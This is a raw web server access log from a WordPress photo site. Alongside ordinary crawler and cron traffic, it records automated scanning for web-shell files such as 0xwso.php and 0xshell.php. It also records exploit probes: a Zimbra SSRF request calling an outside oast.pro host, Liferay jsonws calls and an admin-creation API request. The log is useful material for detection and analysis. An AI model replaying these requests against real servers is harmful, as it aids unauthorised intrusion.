185.61.153.107 - - [18/Oct/2025:08:38:17 -0400] "POST /wp-cron.php?doing_wp_cron=1760791097.7565329074859619140625 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:08:38:19 -0400] "GET /products239704910?kg=0236781762 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:08:38:25 -0400] "GET /products89530876?kg=0088439119 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.106 - - [18/Oct/2025:08:38:45 -0400] "GET /products14439266?kg=0014263260 HTTP/1.1" 200 29051 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:38:46 -0400] "GET /zky.php HTTP/1.1" 404 10903 "http://salhab360photos.com/zky.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:38:51 -0400] "GET /Ryan.php HTTP/1.1" 404 10897 "http://salhab360photos.com/Ryan.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:38:55 -0400] "GET /ryan.php HTTP/1.1" 404 10906 "http://salhab360photos.com/ryan.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:08:38:58 -0400] "GET /products60883478?kg=0060141078 HTTP/1.1" 404 9732 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:08:39:01 -0400] "GET /VenoRyan.php HTTP/1.1" 404 10906 "http://salhab360photos.com/VenoRyan.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:39:07 -0400] "GET /vendor/phpunit/phpunit/src/Util/PHP/wpx.php HTTP/1.1" 404 12355 "http://salhab360photos.com/vendor/phpunit/phpunit/src/Util/PHP/wpx.php" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:08:39:18 -0400] "POST /wp-cron.php?doing_wp_cron=1760791158.0617420673370361328125 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
46.101.70.221 - - [18/Oct/2025:08:39:21 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
164.90.241.135 - - [18/Oct/2025:08:39:21 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
174.138.112.39 - - [18/Oct/2025:08:39:21 -0400] "GET /index.html HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/132.0.0.0"
51.79.229.86 - - [18/Oct/2025:08:39:20 -0400] "GET /2uzum3.php HTTP/1.1" 404 10897 "http://salhab360photos.com/2uzum3.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:39:24 -0400] "GET /2u.php HTTP/1.1" 404 10900 "http://salhab360photos.com/2u.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:39:27 -0400] "GET /2uzum.php HTTP/1.1" 404 10898 "http://salhab360photos.com/2uzum.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:39:53 -0400] "GET /ir.php HTTP/1.1" 404 10903 "http://salhab360photos.com/ir.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:39:57 -0400] "GET /ads.php HTTP/1.1" 404 10895 "http://salhab360photos.com/ads.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:08:39:59 -0400] "GET /products60929038?kg=0060186082 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:08:40:03 -0400] "GET /thr.php HTTP/1.1" 404 10896 "http://salhab360photos.com/thr.php" "Go-http-client/2.0"
66.249.64.106 - - [18/Oct/2025:08:40:15 -0400] "GET /products12334568?kg=0012184229 HTTP/1.1" 200 28732 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:40:10 -0400] "GET /rhs.php HTTP/1.1" 404 10905 "http://salhab360photos.com/rhs.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:40:12 -0400] "POST /EemAdminService/EemAdmin HTTP/1.1" 404 10853 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15"
216.73.216.159 - - [18/Oct/2025:08:40:18 -0400] "GET /products95188470?kg=0094027718 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:08:40:31 -0400] "GET /products95207608?kg=0094046621 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:08:40:30 -0400] "GET /Throvinus.php HTTP/1.1" 404 10905 "http://salhab360photos.com/Throvinus.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:08:40:39 -0400] "GET /products95200848?kg=0094039945 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:08:40:42 -0400] "GET /rog.php HTTP/1.1" 404 10896 "http://salhab360photos.com/rog.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:08:40:45 -0400] "GET /products182045822?kg=0179825834 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:08:40:53 -0400] "GET /throvinus.php HTTP/1.1" 404 10903 "http://salhab360photos.com/throvinus.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:41:03 -0400] "GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/59.0"
51.79.229.86 - - [18/Oct/2025:08:40:57 -0400] "GET /ro.php HTTP/1.1" 404 10896 "http://salhab360photos.com/ro.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:08:41:01 -0400] "GET /products60902306?kg=0060159676 HTTP/1.1" 404 9797 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
157.20.32.210 - - [18/Oct/2025:08:41:06 -0400] "GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15"
157.20.32.210 - - [18/Oct/2025:08:41:10 -0400] "POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1" 404 12309 "-" "Mozilla/5.0 (X11; Linux i686; rv:1.9.5.20) Gecko/ Firefox/3.6.6"
216.73.216.159 - - [18/Oct/2025:08:41:17 -0400] "GET /products206190800?kg=0203676361 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.64.105 - - [18/Oct/2025:08:41:29 -0400] "GET /products4900024?kg=0004840349 HTTP/1.1" 200 29469 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:08:39:43 -0400] "GET /ctg/search/similarImageSearchResultView/?ctgItemCd=58262 HTTP/1.1" 200 28810 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:39:41 -0400] "GET /ft.php HTTP/1.1" 404 10906 "http://salhab360photos.com/ft.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:39:47 -0400] "GET /R.php HTTP/1.1" 404 10902 "http://salhab360photos.com/R.php" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:08:40:15 -0400] "POST /wp-cron.php?doing_wp_cron=1760791215.3539559841156005859375 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
216.73.216.159 - - [18/Oct/2025:08:40:10 -0400] "GET /products3418466?kg=0003376860 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:08:40:20 -0400] "GET /vinus.php HTTP/1.1" 404 10902 "http://salhab360photos.com/vinus.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:08:40:54 -0400] "GET /products22758362?kg=0022480904 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:08:41:00 -0400] "GET /products22798000?kg=0022520057 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:08:41:03 -0400] "GET /action.php HTTP/1.1" 404 10905 "http://salhab360photos.com/action.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:08:41:06 -0400] "GET /products182026602?kg=0179806848 HTTP/1.1" 404 9731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:08:41:16 -0400] "POST /wp-cron.php?doing_wp_cron=1760791276.0516159534454345703125 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
91.188.75.80 - - [18/Oct/2025:08:41:16 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:08:41:10 -0400] "GET /expdoor.php HTTP/1.1" 404 10899 "http://salhab360photos.com/expdoor.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:41:11 -0400] "GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://d3pm34ikdbcl3g7iqchgd973mj68mqgqd.oast.pro%23 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0"
51.79.229.86 - - [18/Oct/2025:08:41:18 -0400] "GET /azuz.php HTTP/1.1" 404 10897 "http://salhab360photos.com/azuz.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:41:22 -0400] "GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://d3pm34ikdbcl3g7iqchgd973mj68mqgqd.oast.pro%23 HTTP/1.1" 404 12366 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0"
216.73.216.159 - - [18/Oct/2025:08:41:26 -0400] "GET /products34981984?kg=0034555457 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:08:41:32 -0400] "GET /asusROG.php HTTP/1.1" 404 10902 "http://salhab360photos.com/asusROG.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:41:33 -0400] "POST /api/jsonws/invoke HTTP/1.1" 404 10869 "https://salhab360photos.com/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15"
216.73.216.159 - - [18/Oct/2025:08:41:35 -0400] "GET /products107166214?kg=0105859390 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:08:41:24 -0400] "GET /ROG.php HTTP/1.1" 404 10905 "http://salhab360photos.com/ROG.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:41:33 -0400] "POST /api/jsonws/invoke HTTP/1.1" 404 10875 "https://salhab360photos.com/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData" "WMS/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
157.20.32.210 - - [18/Oct/2025:08:41:42 -0400] "POST /cgi-bin/libagent.cgi?type=J HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.6"
138.68.166.157 - - [18/Oct/2025:08:41:46 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
206.189.247.132 - - [18/Oct/2025:08:41:46 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
18.171.61.169 - - [18/Oct/2025:08:41:47 -0400] "GET / HTTP/1.1" 200 1404 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1 RDDocuments/8.4.8.940"
51.79.229.86 - - [18/Oct/2025:08:41:40 -0400] "GET /Azuz.php HTTP/1.1" 404 10906 "http://salhab360photos.com/Azuz.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:41:47 -0400] "GET /print.php HTTP/1.1" 404 10897 "http://salhab360photos.com/print.php" "Go-http-client/2.0"
66.249.64.105 - - [18/Oct/2025:08:42:05 -0400] "GET /products12402094?kg=0012250930 HTTP/1.1" 200 29665 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
20.171.207.254 - - [18/Oct/2025:08:42:04 -0400] "GET /products60940920?kg=0060197821 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:08:42:07 -0400] "GET /0xhell.php HTTP/1.1" 404 10900 "http://salhab360photos.com/0xhell.php" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:08:42:20 -0400] "POST /wp-cron.php?doing_wp_cron=1760791340.3542280197143554687500 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:08:42:22 -0400] "GET /0xwso.php HTTP/1.1" 404 10896 "http://salhab360photos.com/0xwso.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:42:27 -0400] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0"
51.79.229.86 - - [18/Oct/2025:08:42:53 -0400] "GET /0xf.php HTTP/1.1" 404 10904 "http://salhab360photos.com/0xf.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:08:42:53 -0400] "GET /products148434878?kg=0146624778 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:08:43:02 -0400] "GET /products206169698?kg=0203655516 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:08:43:01 -0400] "GET /0xff.php HTTP/1.1" 404 10906 "http://salhab360photos.com/0xff.php" "Go-http-client/2.0"
20.171.207.254 - - [18/Oct/2025:08:43:06 -0400] "GET /products60911404?kg=0060168663 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.79.229.86 - - [18/Oct/2025:08:43:15 -0400] "GET /wxw.php HTTP/1.1" 404 10903 "http://salhab360photos.com/wxw.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:41:54 -0400] "GET /hero.php HTTP/1.1" 404 10906 "http://salhab360photos.com/hero.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:42:00 -0400] "GET /heroes.php HTTP/1.1" 404 10896 "http://salhab360photos.com/heroes.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:42:02 -0400] "POST /os/mxperson HTTP/1.1" 404 10855 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15"
51.79.229.86 - - [18/Oct/2025:08:42:14 -0400] "GET /0xshell.php HTTP/1.1" 404 10905 "http://salhab360photos.com/0xshell.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:42:15 -0400] "POST /meaweb/os/mxperson HTTP/1.1" 404 12310 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
66.249.64.105 - - [18/Oct/2025:08:42:21 -0400] "GET /categories/11347680 HTTP/1.1" 200 29002 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
51.79.229.86 - - [18/Oct/2025:08:42:26 -0400] "GET /0xShell.php HTTP/1.1" 404 10906 "http://salhab360photos.com/0xShell.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:42:35 -0400] "GET /0xWso.php HTTP/1.1" 404 10905 "http://salhab360photos.com/0xWso.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:42:40 -0400] "GET /0xfw.php HTTP/1.1" 404 10906 "http://salhab360photos.com/0xfw.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:42:47 -0400] "GET /0xF.php HTTP/1.1" 404 10898 "http://salhab360photos.com/0xF.php" "Go-http-client/2.0"
185.61.153.107 - - [18/Oct/2025:08:43:14 -0400] "POST /wp-cron.php?doing_wp_cron=1760791394.0561339855194091796875 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:08:43:10 -0400] "GET /fxf.php HTTP/1.1" 404 10899 "http://salhab360photos.com/fxf.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:08:43:11 -0400] "GET /products129190886?kg=0127615470 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.159 - - [18/Oct/2025:08:43:17 -0400] "GET /products119082650?kg=0117630504 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:08:43:25 -0400] "GET /dxd.php HTTP/1.1" 404 10903 "http://salhab360photos.com/dxd.php" "Go-http-client/2.0"
66.249.64.105 - - [18/Oct/2025:08:43:38 -0400] "GET /categories/121111428 HTTP/1.1" 200 29043 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.64.105 - - [18/Oct/2025:08:43:40 -0400] "GET /?ctg/search/similarImageSearchResultView/?ctgItemCd=168239 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:43:39 -0400] "GET /0xpriv8.php HTTP/1.1" 404 10898 "http://salhab360photos.com/0xpriv8.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:43:46 -0400] "GET /0xFox.php HTTP/1.1" 404 10902 "http://salhab360photos.com/0xFox.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:43:56 -0400] "GET /0i.php HTTP/1.1" 404 10906 "http://salhab360photos.com/0i.php" "Go-http-client/2.0"
66.249.64.106 - - [18/Oct/2025:08:44:07 -0400] "GET /categories/12733112 HTTP/1.1" 200 28978 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
51.79.229.86 - - [18/Oct/2025:08:44:03 -0400] "GET /axa.php HTTP/1.1" 404 10899 "http://salhab360photos.com/axa.php" "Go-http-client/2.0"
66.249.64.105 - - [18/Oct/2025:08:43:35 -0400] "GET /categories/12585644 HTTP/1.1" 200 29294 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
51.79.229.86 - - [18/Oct/2025:08:43:34 -0400] "GET /0xPriv8.php HTTP/1.1" 404 10897 "http://salhab360photos.com/0xPriv8.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:43:42 -0400] "GET /0xfox.php HTTP/1.1" 404 10903 "http://salhab360photos.com/0xfox.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:43:50 -0400] "GET /0xF0x.php HTTP/1.1" 404 10902 "http://salhab360photos.com/0xF0x.php" "Go-http-client/2.0"
51.79.229.86 - - [18/Oct/2025:08:43:54 -0400] "GET /0xf0x.php HTTP/1.1" 404 10903 "http://salhab360photos.com/0xf0x.php" "Go-http-client/2.0"
66.249.64.105 - - [18/Oct/2025:08:43:56 -0400] "GET /?ctg/search/similarImageSearchResultView/?ctgItemCd=188176 HTTP/1.1" 200 1164 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.64.105 - - [18/Oct/2025:08:43:58 -0400] "GET /categories/12151914 HTTP/1.1" 200 29146 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; GoogleOther)"
51.79.229.86 - - [18/Oct/2025:08:43:59 -0400] "GET /pxp.php HTTP/1.1" 404 10902 "http://salhab360photos.com/pxp.php" "Go-http-client/2.0"
216.73.216.159 - - [18/Oct/2025:08:44:10 -0400] "GET /products126449694?kg=0124907706 HTTP/1.1" 404 9740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.254 - - [18/Oct/2025:08:44:11 -0400] "GET /products60934068?kg=0060191051 HTTP/1.1" 404 9742 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.64.106 - - [18/Oct/2025:08:44:23 -0400] "GET /categories/12237928 HTTP/1.1" 200 28971 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:08:44:19 -0400] "GET /products153908716?kg=0152031863 HTTP/1.1" 404 9741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:08:44:21 -0400] "POST /eonapi/createEonUser?username=admin&apiKey=228ca9cc61083b3d4612dfd5bbdf9f86631b8f79a6630c9c437850549aa8a1bb HTTP/1.1" 404 10856 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
51.79.229.86 - - [18/Oct/2025:08:44:23 -0400] "GET /axioo.php HTTP/1.1" 404 10905 "http://salhab360photos.com/axioo.php" "Go-http-client/2.0"
40.77.167.73 - - [18/Oct/2025:08:44:48 -0400] "GET /?searchWordHeader= HTTP/1.1" 200 1164 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.159 - - [18/Oct/2025:08:44:40 -0400] "GET /products158669636?kg=0156734723 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.79.229.86 - - [18/Oct/2025:08:44:38 -0400] "GET /xenia.php HTTP/1.1" 404 10906 "http://salhab360photos.com/xenia.php" "Go-http-client/2.0"
157.20.32.210 - - [18/Oct/2025:08:44:52 -0400] "POST /session/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15"
216.73.216.159 - - [18/Oct/2025:08:44:52 -0400] "GET /products153846714?kg=0151970616 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.61.153.107 - - [18/Oct/2025:08:44:17 -0400] "POST /wp-cron.php?doing_wp_cron=1760791456.8531029224395751953125 HTTP/1.1" 200 0 "-" "WordPress/6.8.3; https://salhab360photos.com"
51.79.229.86 - - [18/Oct/2025:08:44:14 -0400] "GET /axio.php HTTP/1.1" 404 10905 "http://salhab360photos.com/axio.php" "Go-http-client/2.0"
66.249.64.105 - - [18/Oct/2025:08:44:33 -0400] "GET /categories/12666778 HTTP/1.1" 200 29379 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.159 - - [18/Oct/2025:08:44:28 -0400] "GET /products233609754?kg=0230760936 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
157.20.32.210 - - [18/Oct/2025:08:44:28 -0400] "POST /session/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15"
